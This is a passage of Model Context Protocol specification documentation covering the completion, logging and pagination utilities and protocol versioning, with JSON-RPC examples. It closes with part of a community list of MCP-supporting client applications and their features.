"text": "Invalid departure date: must be in the future. Current date is 08/08/2025."
}
],
"isError": true
}
}
```
## Security Considerations
1. Servers **MUST**:
* Validate all tool inputs
* Implement proper access controls
* Rate limit tool invocations
* Sanitize tool outputs
2. Clients **SHOULD**:
* Prompt for user confirmation on sensitive operations
* Show tool inputs to the user before calling the server, to avoid malicious or
accidental data exfiltration
* Validate tool results before passing to LLM
* Implement timeouts for tool calls
* Log tool usage for audit purposes
# Completion
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/completion
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to offer
autocompletion suggestions for the arguments of prompts and resource templates. When
users are filling in argument values for a specific prompt (identified by name) or
resource template (identified by URI), servers can provide contextual suggestions.
## User Interaction Model
Completion in MCP is designed to support interactive user experiences similar to IDE code
completion.
For example, applications may show completion suggestions in a dropdown or popup menu as
users type, with the ability to filter and select from available options.
However, implementations are free to expose completion through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Servers that support completions **MUST** declare the `completions` capability:
```json theme={null}
{
"capabilities": {
"completions": {}
}
}
```
## Protocol Messages
### Requesting Completions
To get completion suggestions, clients send a `completion/complete` request specifying
what is being completed through a reference type:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "completion/complete",
"params": {
"ref": {
"type": "ref/prompt",
"name": "code_review"
},
"argument": {
"name": "language",
"value": "py"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"completion": {
"values": ["python", "pytorch", "pyside"],
"total": 10,
"hasMore": true
}
}
}
```
For prompts or URI templates with multiple arguments, clients should include previous completions in the `context.arguments` object to provide context for subsequent requests.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "completion/complete",
"params": {
"ref": {
"type": "ref/prompt",
"name": "code_review"
},
"argument": {
"name": "framework",
"value": "fla"
},
"context": {
"arguments": {
"language": "python"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"completion": {
"values": ["flask"],
"total": 1,
"hasMore": false
}
}
}
```
### Reference Types
The protocol supports two types of completion references:
| Type | Description | Example |
| -------------- | --------------------------- | --------------------------------------------------- |
| `ref/prompt` | References a prompt by name | `{"type": "ref/prompt", "name": "code_review"}` |
| `ref/resource` | References a resource URI | `{"type": "ref/resource", "uri": "file:///{path}"}` |
### Completion Results
Servers return an array of completion values ranked by relevance, with:
* Maximum 100 items per response
* Optional total number of available matches
* Boolean indicating if additional results exist
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client: User types argument
Client->>Server: completion/complete
Server-->>Client: Completion suggestions
Note over Client: User continues typing
Client->>Server: completion/complete
Server-->>Client: Refined suggestions
```
## Data Types
### CompleteRequest
* `ref`: A `PromptReference` or `ResourceReference`
* `argument`: Object containing:
* `name`: Argument name
* `value`: Current value
* `context`: Object containing:
* `arguments`: A mapping of already-resolved argument names to their values.
### CompleteResult
* `completion`: Object containing:
* `values`: Array of suggestions (max 100)
* `total`: Optional total matches
* `hasMore`: Additional results flag
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Method not found: `-32601` (Capability not supported)
* Invalid prompt name: `-32602` (Invalid params)
* Missing required arguments: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD**:
* Return suggestions sorted by relevance
* Implement fuzzy matching where appropriate
* Rate limit completion requests
* Validate all inputs
2. Clients **SHOULD**:
* Debounce rapid completion requests
* Cache completion results where appropriate
* Handle missing or partial results gracefully
## Security
Implementations **MUST**:
* Validate all completion inputs
* Implement appropriate rate limiting
* Control access to sensitive suggestions
* Prevent completion-based information disclosure
# Logging
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/logging
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to send
structured log messages to clients. Clients can control logging verbosity by setting
minimum log levels, with servers sending notifications containing severity levels,
optional logger names, and arbitrary JSON-serializable data.
## User Interaction Model
Implementations are free to expose logging through any interface pattern that suits their
needs—the protocol itself does not mandate any specific user interaction model.
## Capabilities
Servers that emit log message notifications **MUST** declare the `logging` capability:
```json theme={null}
{
"capabilities": {
"logging": {}
}
}
```
## Log Levels
The protocol follows the standard syslog severity levels specified in
[RFC 5424](https://datatracker.ietf.org/doc/html/rfc5424#section-6.2.1):
| Level | Description | Example Use Case |
| --------- | -------------------------------- | -------------------------- |
| debug | Detailed debugging information | Function entry/exit points |
| info | General informational messages | Operation progress updates |
| notice | Normal but significant events | Configuration changes |
| warning | Warning conditions | Deprecated feature usage |
| error | Error conditions | Operation failures |
| critical | Critical conditions | System component failures |
| alert | Action must be taken immediately | Data corruption detected |
| emergency | System is unusable | Complete system failure |
## Protocol Messages
### Setting Log Level
To configure the minimum log level, clients **MAY** send a `logging/setLevel` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "logging/setLevel",
"params": {
"level": "info"
}
}
```
### Log Message Notifications
Servers send log messages using `notifications/message` notifications:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/message",
"params": {
"level": "error",
"logger": "database",
"data": {
"error": "Connection failed",
"details": {
"host": "localhost",
"port": 5432
}
}
}
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Configure Logging
Client->>Server: logging/setLevel (info)
Server-->>Client: Empty Result
Note over Client,Server: Server Activity
Server--)Client: notifications/message (info)
Server--)Client: notifications/message (warning)
Server--)Client: notifications/message (error)
Note over Client,Server: Level Change
Client->>Server: logging/setLevel (error)
Server-->>Client: Empty Result
Note over Server: Only sends error level and above
```
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Invalid log level: `-32602` (Invalid params)
* Configuration errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD**:
* Rate limit log messages
* Include relevant context in data field
* Use consistent logger names
* Remove sensitive information
2. Clients **MAY**:
* Present log messages in the UI
* Implement log filtering/search
* Display severity visually
* Persist log messages
## Security
1. Log messages **MUST NOT** contain:
* Credentials or secrets
* Personal identifying information
* Internal system details that could aid attacks
2. Implementations **SHOULD**:
* Rate limit messages
* Validate all data fields
* Control log access
* Monitor for sensitive content
# Pagination
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/pagination
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports paginating list operations that may return
large result sets. Pagination allows servers to yield results in smaller chunks rather
than all at once.
Pagination is especially important when connecting to external services over the
internet, but also useful for local integrations to avoid performance issues with large
data sets.
## Pagination Model
Pagination in MCP uses an opaque cursor-based approach, instead of numbered pages.
* The **cursor** is an opaque string token, representing a position in the result set
* **Page size** is determined by the server, and clients **MUST NOT** assume a fixed page
size
## Response Format
Pagination starts when the server sends a **response** that includes:
* The current page of results
* An optional `nextCursor` field if more results exist
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"result": {
"resources": [...],
"nextCursor": "eyJwYWdlIjogM30="
}
}
```
## Request Format
After receiving a cursor, the client can *continue* paginating by issuing a request
including that cursor:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "124",
"method": "resources/list",
"params": {
"cursor": "eyJwYWdlIjogMn0="
}
}
```
## Pagination Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Client->>Server: List Request (no cursor)
loop Pagination Loop
Server-->>Client: Page of results + nextCursor
Client->>Server: List Request (with cursor)
end
```
## Operations Supporting Pagination
The following MCP operations support pagination:
* `resources/list` - List available resources
* `resources/templates/list` - List resource templates
* `prompts/list` - List available prompts
* `tools/list` - List available tools
## Implementation Guidelines
1. Servers **SHOULD**:
* Provide stable cursors
* Handle invalid cursors gracefully
2. Clients **SHOULD**:
* Treat a missing `nextCursor` as the end of results
* Support both paginated and non-paginated flows
3. Clients **MUST** treat cursors as opaque tokens:
* Don't make assumptions about cursor format
* Don't attempt to parse or modify cursors
* Don't persist cursors across sessions
## Error Handling
Invalid cursors **SHOULD** result in an error with code -32602 (Invalid params).
# Versioning
Source: https://modelcontextprotocol.io/specification/versioning
The Model Context Protocol uses string-based version identifiers following the format
`YYYY-MM-DD`, to indicate the last date backwards incompatible changes were made.
The protocol version will *not* be incremented when the
protocol is updated, as long as the changes maintain backwards compatibility. This allows
for incremental improvements while preserving interoperability.
## Revisions
Revisions may be marked as:
* **Draft**: in-progress specifications, not yet ready for consumption.
* **Current**: the current protocol version, which is ready for use and may continue to
receive backwards compatible changes.
* **Final**: past, complete specifications that will not be changed.
The **current** protocol version is [**2025-11-25**](/specification/2025-11-25/).
## Negotiation
Version negotiation happens during
[initialization](/specification/latest/basic/lifecycle#initialization). Clients and
servers **MAY** support multiple protocol versions simultaneously, but they **MUST**
agree on a single version to use for the session.
The protocol provides appropriate error handling if version negotiation fails, allowing
clients to gracefully terminate connections when they cannot find a version compatible
with the server.
# Example Clients
Source: https://modelcontextprotocol.io/clients
A list of applications that support MCP integrations
This page showcases applications that support the Model Context Protocol (MCP). Each client may support different MCP features:
| Feature | Description |
| ---------------- | --------------------------------------------------------- |
| | Server-exposed data and content |
| | Pre-defined templates for LLM interactions |
| | Executable functions that LLMs can invoke |
| | Support for tools/prompts/resources changed notifications |
| | Server-provided guidance for LLMs |
| | Server-initiated LLM completions |
| | Filesystem boundary definitions |
| | User information requests |
| | Long-running operation tracking |
| | Interactive HTML interfaces |
This list is maintained by the community. If you notice any inaccuracies or would like to add or update information about MCP support in your application, please [submit a pull request](https://github.com/modelcontextprotocol/modelcontextprotocol/pulls).
## Client details
5ire is an open source cross-platform desktop AI assistant that supports tools through MCP servers.
**Key features:**
* Built-in MCP servers can be quickly enabled and disabled.
* Users can add more servers by modifying the configuration file.
* It is open-source and user-friendly, suitable for beginners.
* Future support for MCP will be continuously improved.
AgentAI is a Rust library designed to simplify the creation of AI agents. The library includes seamless integration with MCP Servers.
**Key features:**
* Multi-LLM – We support most LLM APIs (OpenAI, Anthropic, Gemini, Ollama, and all OpenAI API Compatible).
* Built-in support for MCP Servers.
* Create agentic flows in a type- and memory-safe language like Rust.
**Learn more:**
* [Example of MCP Server integration](https://github.com/AdamStrojek/rust-agentai/blob/master/examples/tools_mcp.rs)
AgenticFlow is a no-code AI platform that helps you build agents that handle sales, marketing, and creative tasks around the clock. Connect 2,500+ APIs and 10,000+ tools securely via MCP.
**Key features:**
* No-code AI agent creation and workflow building.
* Access a vast library of 10,000+ tools and 2,500+ APIs through MCP.
* Simple 3-step process to connect MCP servers.
* Securely manage connections and revoke access anytime.
**Learn more:**
* [AgenticFlow MCP Integration](https://agenticflow.ai/mcp)
AIQL TUUI is a native, cross-platform desktop AI chat application with MCP support. It supports multiple AI providers (e.g., Anthropic, Cloudflare, Deepseek, OpenAI, Qwen), local AI models (via vLLM, Ray, etc.), and aggregated API platforms (such as Deepinfra, Openrouter, and more).
**Key features:**
* **Dynamic LLM API & Agent Switching**: Seamlessly toggle between different LLM APIs and agents on the fly.
* **Comprehensive Capabilities Support**: Built-in support for tools, prompts, resources, and sampling methods.
* **Configurable Agents**: Enhanced flexibility with selectable and customizable tools via agent settings.
* **Advanced Sampling Control**: Modify sampling parameters and leverage multi-round sampling for optimal results.
* **Cross-Platform Compatibility**: Fully compatible with macOS, Windows, and Linux.
* **Free & Open-Source (FOSS)**: Permissive licensing allows modifications and custom app bundling.
**Learn more:**
* [TUUI document](https://www.tuui.com/)
* [AIQL GitHub repository](https://github.com/AI-QL)
Amazon Q CLI is an open-source, agentic coding assistant for terminals.
**Key features:**
* Full support for MCP servers.
* Edit prompts using your preferred text editor.
* Access saved prompts instantly with `@`.
* Control and organize AWS resources directly from your terminal.
* Tools, profiles, context management, auto-compact, and so much more!
**Get Started**
```bash theme={null}
brew install amazon-q
```
Amazon Q IDE is an open-source, agentic coding assistant for IDEs.
**Key features:**
* Support for the VSCode, JetBrains, Visual Studio, and Eclipse IDEs.
* Control and organize AWS resources directly from your IDE.
* Manage permissions for each MCP tool via the IDE user interface.
Amp is an agentic coding tool built by Sourcegraph. It runs in VS Code (and compatible forks like Cursor, Windsurf, and VSCodium), JetBrains IDEs, Neovim, and as a command-line tool. It's also multiplayer — you can share threads and collaborate with your team.
**Key features:**
* Granular control over enabled tools and permissions
* Support for MCP servers defined in VS Code `mcp.json`
Apify MCP Tester is an open-source client that connects to any MCP server using Server-Sent Events (SSE).
It is a standalone Apify Actor designed for testing MCP servers over SSE, with support for Authorization headers.
It uses plain JavaScript (old-school style) and is hosted on Apify, allowing you to run it without any setup.
**Key features:**
* Connects to any MCP server via SSE.
* Works with the [Apify MCP Server](https://mcp.apify.com) to interact with one or more Apify [Actors](https://apify.com/store).
* Dynamically utilizes tools based on context and user queries (if supported by the server).
Apigene MCP Client is an AI-powered conversational interface that enables seamless interaction with multiple applications, APIs, and MCP servers through natural language. It provides a unified interface for deploying agents across different AI platforms with optimized performance and governance.
**Key features:**
* **Multi-LLM Compatibility**: Works seamlessly with all leading AI platforms including Claude, OpenAI (ChatGPT), Gemini, xAI, and OpenRouter. Deploy the same agent across different platforms without modification.
* **Optimized for Cost & Performance**: Dynamic tool loading loads tools only when needed, enabling thousands of tools without context bloat. Tool output optimization provides up to 99% payload reduction via compact JSON representation. Parallel execution runs multiple tool calls simultaneously for 10x faster responses.
* **Unified Multi-Tool Interface**: Mesh multiple APIs and MCP servers into a single agent. Interact with all tools seamlessly from one Copilot interface without glue code or framework-specific logic.
* **Governed Access & Audit**: Fine-grained access control defines exactly which operations each user or agent can perform. Complete audit trail tracks every tool call with timestamps, inputs, and outputs for compliance.
**Learn more:**
* [Apigene Copilot Documentation](https://docs.apigene.ai/user-guide/copilot)
Augment Code is an AI-powered coding platform for VS Code and JetBrains with autonomous agents, chat, and completions. Both local and remote agents are backed by full codebase awareness and native support for MCP, enabling enhanced context through external sources and tools.
**Key features:**
* Full MCP support in local and remote agents.
* Add additional context through MCP servers.
* Automate your development workflows with MCP tools.
* Works in VS Code and JetBrains IDEs.
Avatar-Shell is an electron-based MCP client application that prioritizes avatar conversations and media output such as images.
**Key features:**
* MCP tools and resources can be used
* Supports avatar-to-avatar communication via socket.io.
* Supports the mixed use of multiple LLM APIs.
* The daemon mechanism allows for flexible scheduling.
BeeAI Framework is an open-source framework for building, deploying, and serving powerful agentic workflows at scale. The framework includes the **MCP Tool**, a native feature that simplifies the integration of MCP servers into agentic workflows.
**Key features:**
* Seamlessly incorporate MCP tools into agentic workflows.
* Quickly instantiate framework-native tools from connected MCP client(s).
* Planned future support for agentic MCP capabilities.
**Learn more:**
* [Example of using MCP tools in agentic workflow](https://i-am-bee.github.io/beeai-framework/#/typescript/tools?id=using-the-mcptool-class)
BoltAI is a native, all-in-one AI chat client with MCP support. BoltAI supports multiple AI providers (OpenAI, Anthropic, Google AI...), including local AI models (via Ollama, LM Studio or LMX)
**Key features:**
* MCP Tool integrations: once configured, user can enable individual MCP server in each chat
* MCP quick setup: import configuration from Claude Desktop app or Cursor editor
* Invoke MCP tools inside any app with AI Command feature
* Integrate with remote MCP servers in the mobile app
**Learn more:**
* [BoltAI docs](https://boltai.com/docs/plugins/mcp-servers)
* [BoltAI website](https://boltai.com)
Call Chirp uses AI to capture every critical detail from your business conversations, automatically syncing insights to your CRM and project tools so you never miss another deal-closing moment.
**Key features:**
* Save transcriptions from Zoom, Google Meet, and more
* MCP Tools for voice AI agents
* Remote MCP servers support
Chatbox is a better UI and desktop app for ChatGPT, Claude, and other LLMs, available on Windows, Mac, Linux, and the web. It's open-source and has garnered 37K stars on GitHub.
**Key features:**
* Tools support for MCP servers
* Support both local and remote MCP servers
* Built-in MCP servers marketplace
ChatFrame is a cross-platform desktop chatbot that unifies access to multiple AI language models, supports custom tool integration via MCP servers, and enables RAG conversations with your local files—all in a single, polished app for macOS and Windows.
**Key features:**
* Unified access to top LLM providers (OpenAI, Anthropic, DeepSeek, xAI, and more) in one interface
* Built-in retrieval-augmented generation (RAG) for instant, private search across your PDFs, text, and code files
* Plug-in system for custom tools via Model Context Protocol (MCP) servers
* Multimodal chat: supports images, text, and live interactive artifacts
ChatGPT is OpenAI's AI assistant that provides MCP support for remote servers to conduct deep research.
**Key features:**
* Support for MCP via connections UI in settings
* Access to search tools from configured MCP servers for deep research
* Enterprise-grade security and compliance features
ChatWise is a desktop-optimized, high-performance chat application that lets you bring your own API keys. It supports a wide range of LLMs and integrates with MCP to enable tool workflows.
**Key features:**
* Tools support for MCP servers
* Offer built-in tools like web search, artifacts and image generation.
Chorus is a native Mac app for chatting with AIs. Chat with multiple models at once, run tools and MCPs, create projects, quick chat, bring your own key, all in a blazing fast, keyboard shortcut friendly app.
**Key features:**
* MCP support with one-click install
* Built in tools, like web search, terminal, and image generation
* Chat with multiple models at once (cloud or local)
* Create projects with scoped memory
* Quick chat with an AI that can see your screen
Claude Code is an interactive agentic coding tool from Anthropic that helps you code faster through natural language commands. It supports MCP integration for resources, prompts, tools, and roots, and also functions as an MCP server to integrate with other clients.
**Key features:**
* Full support for resources, prompts, tools, and roots from MCP servers
* Offers its own tools through an MCP server for integrating with other MCP clients
Claude Desktop provides comprehensive support for MCP, enabling deep integration with local tools and data sources.
**Key features:**
* Full support for resources, allowing attachment of local files and data
* Support for prompt templates
* Tool integration for executing commands and scripts
* Local server connections for enhanced privacy and security
Claude.ai is Anthropic's web-based AI assistant that provides MCP support for remote servers.
**Key features:**
* Support for remote MCP servers via integrations UI in settings
* Access to tools, prompts, and resources from configured MCP servers
* Seamless integration with Claude's conversational interface
* Enterprise-grade security and compliance features
Cline is an autonomous coding agent in VS Code that edits files, runs commands, uses a browser, and more–with your permission at each step.
**Key features:**
* Create and add tools through natural language (e.g. "add a tool that searches the web")
* Share custom MCP servers Cline creates with others via the `~/Documents/Cline/MCP` directory
* Displays configured MCP servers along with their tools, resources, and any error logs
CodeGPT is a popular VS Code and Jetbrains extension that brings AI-powered coding assistance to your editor. It supports integration with MCP servers for tools, allowing users to leverage external AI capabilities directly within their development workflow.
**Key features:**
* Use MCP tools from any configured MCP server
* Seamless integration with VS Code and Jetbrains UI
* Supports multiple LLM providers and custom endpoints
**Learn more:**
* [CodeGPT Documentation](https://docs.codegpt.co/)
Codex is a lightweight AI-powered coding agent from OpenAI that runs in your terminal.
**Key features:**
* Support for MCP tools (listing and invocation)
* Support for MCP resources (list, read, and templates)
* Elicitation support (routes requests to TUI for user input)
* Supports STDIO and HTTP streaming transports with OAuth
* Also available as VS Code extension
Continue is an open-source AI code assistant, with built-in support for all MCP features.
**Key features:**
* Type "@" to mention MCP resources
* Prompt templates surface as slash commands
* Use both built-in and MCP tools directly in chat
* Supports VS Code and JetBrains IDEs, with any LLM
Copilot-MCP enables AI coding assistance via MCP.
**Key features:**
* Support for MCP tools and resources
* Integration with development workflows
* Extensible AI capabilities
Cursor is an AI code editor.
**Key features:**
* Support for MCP tools in Cursor Composer
* Support for roots
* Support for prompts
* Support for elicitation
* Support for both STDIO and SSE
Daydreams is a generative agent framework for executing anything onchain
**Key features:**
* Supports MCP Servers in config
* Exposes MCP Client
ECA is a Free and open-source editor-agnostic tool that aims to easily link LLMs and Editors, giving the best UX possible for AI pair programming using a well-defined protocol
**Key features:**
* **Editor-agnostic**: protocol for any editor to integrate.
* **Single configuration**: Configure eca making it work the same in any editor via global or local configs.
* **Chat** interface: ask questions, review code, work together to code.
* **Agentic**: let LLM work as an agent with its native tools and MCPs you can configure.
* **Context**: support: giving more details about your code to the LLM, including MCP resources and prompts.
* **Multi models**: Login to OpenAI, Anthropic, Copilot, Ollama local models and many more.
* **OpenTelemetry**: Export metrics of tools, prompts, server usage.
Emacs Mcp is an Emacs client designed to interface with MCP servers, enabling seamless connections and interactions. It provides MCP tool invocation support for AI plugins like [gptel](https://github.com/karthink/gptel) and [llm](https://github.com/ahyatt/llm), adhering to Emacs' standard tool invocation format. This integration enhances the functionality of AI tools within the Emacs ecosystem.
**Key features:**
* Provides MCP tool support for Emacs.
fast-agent is a Python Agent framework, with simple declarative support for creating Agents and Workflows, with full multi-modal support for Anthropic and OpenAI models.
**Key features:**
* PDF and Image support, based on MCP Native types
* Interactive front-end to develop and diagnose Agent applications, including passthrough and playback simulators
* Built in support for "Building Effective Agents" workflows.
* Deploy Agents as MCP Servers
Firebender is an IntelliJ plugin that offers a world-class coding agent with MCP integration for tool calling.
**Key features:**
* Tool integration for executing commands and scripts via STDIO, SSE indirectly supported via mcp-remote npm package.
* Local server connections for enhanced privacy and security
* MCPs can be installed via project rules or local workstation rules files.
* Individual tools within MCPs can be turned off.
FlowDown is a blazing fast and smooth client app for using AI/LLM, with a strong emphasis on privacy and user experience. It supports MCP servers to extend its capabilities with external tools, allowing users to build powerful, customized workflows.
**Key features:**
* **Seamless MCP Integration**: Easily connect to MCP servers to utilize a wide range of external tools.
* **Privacy-First Design**: Your data stays on your device. We don't collect any user data, ensuring complete privacy.
* **Lightweight & Efficient**: A compact and optimized design ensures a smooth and responsive experience with any AI model.
* **Broad Compatibility**: Works with all OpenAI-compatible service providers and supports local offline models through MLX.
* **Rich User Experience**: Features beautifully formatted Markdown, blazing-fast text rendering, and intelligent, automated chat titling.
**Learn more:**
* [FlowDown website](https://flowdown.ai/)
* [FlowDown documentation](https://apps.qaq.wiki/docs/flowdown/)
Think n8n + ChatGPT. FLUJO is a desktop application that integrates with MCP to provide a workflow-builder interface for AI interactions. Built with Next.js and React, it supports both online and offline (ollama) models, it manages API Keys and environment variables centrally and can install MCP Servers from GitHub. FLUJO has a ChatCompletions endpoint and flows can be executed from other AI applications like Cline, Roo or Claude.
**Key features:**
* Environment & API Key Management
* Model Management
* MCP Server Integration
* Workflow Orchestration
* Chat Interface
Gemini CLI is an open-source AI agent that brings the power of Gemini directly into your terminal.
Programmatically assemble prompts for LLMs using GenAIScript (in JavaScript). Orchestrate LLMs, tools, and data in JavaScript.
**Key features:**
* JavaScript toolbox to work with prompts
* Abstraction to make it easy and productive
* Seamless Visual Studio Code integration
Genkit is a cross-language SDK for building and integrating GenAI features into applications. The [genkitx-mcp](https://github.com/firebase/genkit/tree/main/js/plugins/mcp) plugin enables consuming MCP servers as a client or creating MCP servers from Genkit tools and prompts.
**Key features:**
* Client support for tools and prompts (resources partially supported)
* Rich discovery with support in Genkit's Dev UI playground
* Seamless interoperability with Genkit's existing tools and prompts
* Works across a wide variety of GenAI models from top providers
Delegate tasks to GitHub Copilot coding agent and let it work in the background while you stay focused on the highest-impact and most interesting work
**Key features:**
* Delegate tasks to Copilot from GitHub Issues, Visual Studio Code, GitHub Copilot Chat or from your favorite MCP host using the GitHub MCP Server
* Tailor Copilot to your project by [customizing the agent's development environment](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/customizing-the-development-environment-for-copilot-coding-agent#preinstalling-tools-or-dependencies-in-copilots-environment) or [writing custom instructions](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/best-practices-for-using-copilot-to-work-on-tasks#adding-custom-instructions-to-your-repository)
* [Augment Copilot's context and capabilities with MCP tools](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/extending-copilot-coding-agent-with-mcp), with support for both local and remote MCP servers
Glama is a comprehensive AI workspace and integration platform that offers a unified interface to leading LLM providers, including OpenAI, Anthropic, and others. It supports the Model Context Protocol (MCP) ecosystem, enabling developers and enterprises to easily discover, build, and manage MCP servers.
**Key features:**
* Integrated [MCP Server Directory](https://glama.ai/mcp/servers)
* Integrated [MCP Tool Directory](https://glama.ai/mcp/tools)
* Host MCP servers and access them via the Chat or SSE endpoints
– Ability to chat with multiple LLMs and MCP servers at once
* Upload and analyze local files and data
* Full-text search across all your chats and data
goose is an open source AI agent that supercharges your software development by automating coding tasks.
**Key features:**
* Expose MCP functionality to goose through tools.
* MCPs can be installed directly via the [extensions directory](https://block.github.io/goose/v1/extensions/), CLI, or UI.
* goose allows you to extend its functionality by [building your own MCP servers](https://block.github.io/goose/docs/tutorials/custom-extensions).
* Includes built-in extensions for development, memory, computer control, and auto-visualization.
gptme is a open-source terminal-based personal AI assistant/agent, designed to assist with programming tasks and general knowledge work.
**Key features:**
* CLI-first design with a focus on simplicity and ease of use
* Rich set of built-in tools for shell commands, Python execution, file operations, and web browsing
* Local-first approach with support for multiple LLM providers
* Open-source, built to be extensible and easy to modify
HyperAgent is Playwright supercharged with AI. With HyperAgent, you no longer need brittle scripts, just powerful natural language commands. Using MCP servers, you can extend the capability of HyperAgent, without having to write any code.
**Key features:**
* AI Commands: Simple APIs like page.ai(), page.extract() and executeTask() for any AI automation
* Fallback to Regular Playwright: Use regular Playwright when AI isn't needed
* Stealth Mode – Avoid detection with built-in anti-bot patches
* Cloud Ready – Instantly scale to hundreds of sessions via [Hyperbrowser](https://www.hyperbrowser.ai/)
* MCP Client – Connect to tools like Composio for full workflows (e.g. writing web data to Google Sheets)
Jenova is the best MCP client for non-technical users, especially on mobile.
**Key features:**
* 30+ pre-integrated MCP servers with one-click integration of custom servers
* MCP recommendation capability that suggests the best servers for specific tasks
* Multi-agent architecture with leading tool use reliability and scalability, supporting unlimited concurrent MCP server connections through RAG-powered server metadata
* Model agnostic platform supporting any leading LLMs (OpenAI, Anthropic, Google, etc.)
* Unlimited chat history and global persistent memory powered by RAG
* Easy creation of custom agents with custom models, instructions, knowledge bases, and MCP servers
* Local MCP server (STDIO) support coming soon with desktop apps
JetBrains AI Assistant plugin provides AI-powered features for software development available in all JetBrains IDEs.
**Key features:**
* Unlimited code completion powered by Mellum, JetBrains' proprietary AI model.
* Context-aware AI chat that understands your code and helps you in real time.
* Access to top-tier models from OpenAI, Anthropic, and Google.
* Offline mode with connected local LLMs via Ollama or LM Studio.
* Deep integration into IDE workflows, including code suggestions in the editor, VCS assistance, runtime error explanation, and more.
Junie is JetBrains' AI coding agent for JetBrains IDEs and Android Studio.
**Key features:**
* Connects to MCP servers over **stdio** to use external tools and data sources.
* Per-command approval with an optional allowlist.
* Config via `mcp.json` (global `~/.junie/mcp.json` or project `.junie/mcp/`).
Kilo Code is an autonomous coding AI dev team in VS Code that edits files, runs commands, uses a browser, and more.
**Key features:**
* Create and add tools through natural language (e.g. "add a tool that searches the web")
* Discover MCP servers via the MCP Marketplace
* One click MCP server installs via MCP Marketplace
* Displays configured MCP servers along with their tools, resources, and any error logs
Klavis AI is an Open-Source Infra to Use, Build & Scale MCPs with ease.
**Key features:**
* Slack/Discord/Web MCP clients for using MCPs directly
* Simple web UI dashboard for easy MCP configuration
* Direct OAuth integration with Slack & Discord Clients and MCP Servers for secure user authentication
* SSE transport support
**Learn more:**
* [Demo video showing MCP usage in Slack/Discord](https://youtu.be/9-QQAhrQWw8)
Langdock is the enterprise-ready solution for rolling out AI to all of your employees while enabling your developers to build and deploy custom AI workflows on top.
**Key features:**
* Remote MCP Server (SSE & Streamable HTTP) support, connect to any MCP server via OAuth, API Key, or without authentication.
* MCP Tool discovery and management, including tool confirmation UI.
* Enterprise-grade security and compliance features
Langflow is an open-source visual builder that lets developers rapidly prototype and build AI applications, it integrates with the Model Context Protocol (MCP) as both an MCP server and an MCP client.
**Key features:**
* Full support for using MCP server tools to build agents and flows.
* Export agents and flows as MCP server
* Local & remote server connections for enhanced privacy and security
**Learn more:**
* [Demo video showing how to use Langflow as both an MCP client & server](https://www.youtube.com/watch?v=pEjsaVVPjdI)
LibreChat is an open-source, customizable AI chat UI that supports multiple AI providers, now including MCP integration.
**Key features:**
* Extend current tool ecosystem, including [Code Interpreter](https://www.librechat.ai/docs/features/code_interpreter) and Image generation tools, through MCP servers
* Add tools to customizable [Agents](https://www.librechat.ai/docs/features/agents), using a variety of LLMs from top providers
* Open-source and self-hostable, with secure multi-user support
* Future roadmap includes expanded MCP feature support
LM Studio is a cross-platform desktop app for discovering, downloading, and running open-source LLMs locally. You can now connect local models to tools via Model Context Protocol (MCP).
**Key features:**
* Use MCP servers with local models on your computer. Add entries to `mcp.json` and save to get started.
* Tool confirmation UI: when a model calls a tool, you can confirm the call in the LM Studio app.
* Cross-platform: runs on macOS, Windows, and Linux, one-click installer with no need to fiddle in the command line
* Supports GGUF (llama.cpp) or MLX models with GPU acceleration
* GUI & terminal mode: use the LM Studio app or CLI (lms) for scripting and automation
**Learn more:**
* [Docs: Using MCP in LM Studio](https://lmstudio.ai/docs/app/plugins/mcp)
* [Create a 'Add to LM Studio' button for your server](https://lmstudio.ai/docs/app/plugins/mcp/deeplink)
* [Announcement blog: LM Studio + MCP](https://lmstudio.ai/blog/mcp)
LM-Kit.NET is a local-first Generative AI SDK for .NET (C# / VB.NET) that can act as an **MCP client**. Current MCP support: **Tools only**.
**Key features:**
* Consume MCP server tools over HTTP/JSON-RPC 2.0 (initialize, list tools, call tools).
* Programmatic tool discovery and invocation via `McpClient`.
* Easy integration in .NET agents and applications.
**Learn more:**
* [Docs: Using MCP in LM-Kit.NET](https://docs.lm-kit.com/lm-kit-net/api/LMKit.Mcp.Client.McpClient.html)
* [Creating AI agents](https://lm-kit.com/solutions/ai-agents)
* Product page: [LM-Kit.NET](https://lm-kit.com/products/lm-kit-net/)
Lutra is an AI agent that transforms conversations into actionable, automated workflows.
**Key features:**
* Easy MCP Integration: Connecting Lutra to MCP servers is as simple as providing the server URL; Lutra handles the rest behind the scenes.
* Chat to Take Action: Lutra understands your conversational context and goals, automatically integrating with your existing apps to perform tasks.
* Reusable Playbooks: After completing a task, save the steps as reusable, automated workflows—simplifying repeatable processes and reducing manual effort.
* Shareable Automations: Easily share your saved playbooks with teammates to standardize best practices and accelerate collaborative workflows.
**Learn more:**
